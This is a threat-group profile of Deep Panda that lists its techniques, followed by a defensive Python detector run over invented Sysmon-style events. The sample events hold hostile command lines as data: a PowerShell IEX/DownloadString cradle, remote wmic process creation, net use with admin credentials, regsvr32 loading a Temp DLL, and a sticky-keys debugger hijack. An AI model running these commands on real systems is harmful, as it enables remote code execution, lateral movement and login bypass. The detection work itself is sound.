Group: Deep Panda, Shell Crew, ...
Aliases: Deep Panda, Shell Crew, WebMasters, KungFu Kittens, PinkPanther, Black Vine
Deep Panda is a suspected Chinese threat group known to target many industries, including government, defense, financial, and telecommunications.[1] The intrusion into healthcare company Anthem has been attributed to Deep Panda.[2] This group is also known as Shell Crew, WebMasters, KungFu Kittens, and PinkPanther.[3] Deep Panda also appears to be known as Black Vine, based on the attribution of both group names to the Anthem intrusion.[4]
Techniques used:
- PowerShell - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.[1]
- Windows Management Instrumentation - The Deep Panda group is known to utilize WMI for lateral movement.[1]
- Web Shell - Deep Panda uses Web shells on publicly accessible Web servers to access victim networks.[5]
- Windows Admin Shares - Deep Panda uses net.exe to connect to network shares using "net use" commands with compromised credentials.[1]
- Process Discovery - Deep Panda uses the Microsoft Tasklist utility to list processes running on systems.[1]
- Scripting - Deep Panda has used PowerShell scripts to download and execute programs in memory, without writing to disk.[1]
- Indicator Removal from Tools - Deep Panda has updated and modified its malware, resulting in different hash values that evade detection.[4]
- Regsvr32 - Deep Panda has used regsvr32.exe to execute a server variant of Derusbi in victim networks.[3]
- Accessibility Features - Deep Panda has used the sticky-keys technique to bypass the RDP login screen on remote systems during intrusions.[3]
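Each technique above maps to a behaviour that shows up in endpoint telemetry, which matters because the group's hash-changing (Indicator Removal from Tools) makes file hashes a weak detection key. The following Python is an added example, not code from the MITRE page or from any vendor: it encodes one behavioural detection per listed technique and runs them over constructed Sysmon-style process-creation and registry-set records. The hosts, paths, command lines and sample values are invented, and the regular expressions are illustrative starting points rather than a tuned rule set.

```python
"""Behavioural detections for the Deep Panda tradecraft listed above, run over
constructed Sysmon-style records (hypothetical data, not from any real incident).
Added example; not MITRE's or any vendor's code."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    technique: str
    severity: str
    evidence: str


# Process-creation rules: (technique, severity, image regex, command-line regex).
# Keyed on behaviour rather than hashes because the group re-hashes its tooling.
PROCESS_RULES = [
    # Download-and-execute in memory: download cradles or encoded command lines.
    ("PowerShell in-memory download/execute", "high",
     r"powershell(_ise)?\.exe$",
     r"(DownloadString|DownloadData|Invoke-Expression|\bIEX\b|-EncodedCommand|-enc\b|FromBase64String)"),
    # Remote process creation through WMI, seen on the source host.
    ("WMI lateral movement (remote wmic)", "high",
     r"wmic\.exe$",
     r"/node:\S+.*process\s+call\s+create"),
    # net use against a UNC path with explicit credentials; a bare "net use" listing is ignored.
    ("Windows Admin Shares (net use with credentials)", "medium",
     r"net1?\.exe$",
     r"\buse\s+\\\\[^\s\\]+\\\S+.*\s/user:"),
    # Process listing is low fidelity on its own; useful when correlated with the rest.
    ("Process Discovery (tasklist)", "low",
     r"tasklist\.exe$",
     r".*"),
    # regsvr32 registering a DLL from a URL or a user-writable location rather than an installer path.
    ("Regsvr32 loading DLL from URL or user-writable path", "high",
     r"regsvr32\.exe$",
     r"(https?://|\\Temp\\|\\Users\\Public\\|\\AppData\\|\\ProgramData\\)"),
]

# Parent/child rules: (technique, severity, parent image regex, child image regex).
PARENT_RULES = [
    # A web server worker spawning a shell is the classic web-shell footprint.
    ("Web Shell (web server spawning a shell)", "high",
     r"(w3wp|httpd|nginx|tomcat\d*|php-cgi)\.exe$",
     r"(cmd|powershell|cscript|wscript)\.exe$"),
    # On the target host, remote WMI execution surfaces as a child of WmiPrvSE.exe.
    ("WMI lateral movement (process spawned by WmiPrvSE)", "high",
     r"WmiPrvSE\.exe$",
     r"(cmd|powershell|rundll32|regsvr32)\.exe$"),
]

# Sticky keys and the other accessibility helpers launch pre-logon; a Debugger
# value under their IFEO key redirects that launch to another program.
IFEO_DEBUGGER_RE = (r"\\Image File Execution Options\\"
                    r"(sethc|utilman|osk|narrator|magnify|displayswitch|atbroker)\.exe\\Debugger$")

# Constructed sample telemetry (hypothetical): id 1 = process creation, id 13 = registry value set.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": r'wmic /node:10.0.0.5 /user:corp\svc process call create "cmd /c tasklist"'},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": r"net use \\10.0.0.7\C$ /user:corp\admin *"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\tasklist.exe",
     "cmdline": "tasklist /v"},
    {"id": 1, "parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Windows\Temp\srv.dll"},
    {"id": 13, "target": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "details": r"C:\Windows\System32\cmd.exe"},
    {"id": 1, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c tasklist"},
    {"id": 1, "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -EncodedCommand QQBCAEMA"},  # constructed base64 placeholder
    # Benign controls: a share listing and an interactive cmdlet from Explorer.
    {"id": 1, "parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\net.exe", "cmdline": "net use"},
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell Get-Date"},
]


def evaluate(event: dict) -> list[Finding]:
    """Return every finding a single event triggers (possibly several)."""
    findings: list[Finding] = []
    if event.get("id") == 1:
        image, cmd, parent = event.get("image", ""), event.get("cmdline", ""), event.get("parent", "")
        for name, sev, img_re, cmd_re in PROCESS_RULES:
            if re.search(img_re, image, re.I) and re.search(cmd_re, cmd, re.I):
                findings.append(Finding(name, sev, cmd))
        for name, sev, par_re, img_re in PARENT_RULES:
            if re.search(par_re, parent, re.I) and re.search(img_re, image, re.I):
                findings.append(Finding(name, sev, f"{parent} -> {image}"))
    elif event.get("id") == 13:
        target = event.get("target", "")
        if re.search(IFEO_DEBUGGER_RE, target, re.I):
            findings.append(Finding("Accessibility Features (IFEO debugger on accessibility binary)", "high",
                                    f"{target} = {event.get('details', '')}"))
    return findings


def scan(events) -> list[Finding]:
    return [f for e in events for f in evaluate(e)]


def summarize(findings) -> dict[str, int]:
    """Count findings per technique, the view an analyst triages from."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.technique] = counts.get(f.technique, 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.severity:6}] {f.technique}: {f.evidence}")
```

The two benign records produce no findings, while the WMI child record fires twice (encoded PowerShell plus the WmiPrvSE parent), which is the point of keeping rules independent and summarizing per technique: a single low-fidelity hit such as tasklist is noise, but several of these techniques on one host within a short window is the pattern the profile above describes.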
References:
1. Alperovitch, D. (2014, July 7). Deep in Thought: Chinese Targeting of National Security Think Tanks. Retrieved November 12, 2014.
2. ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.
3. RSA Incident Response. (2014, January). RSA Incident Response Emerging Threat Profile: Shell Crew. Retrieved January 14, 2016.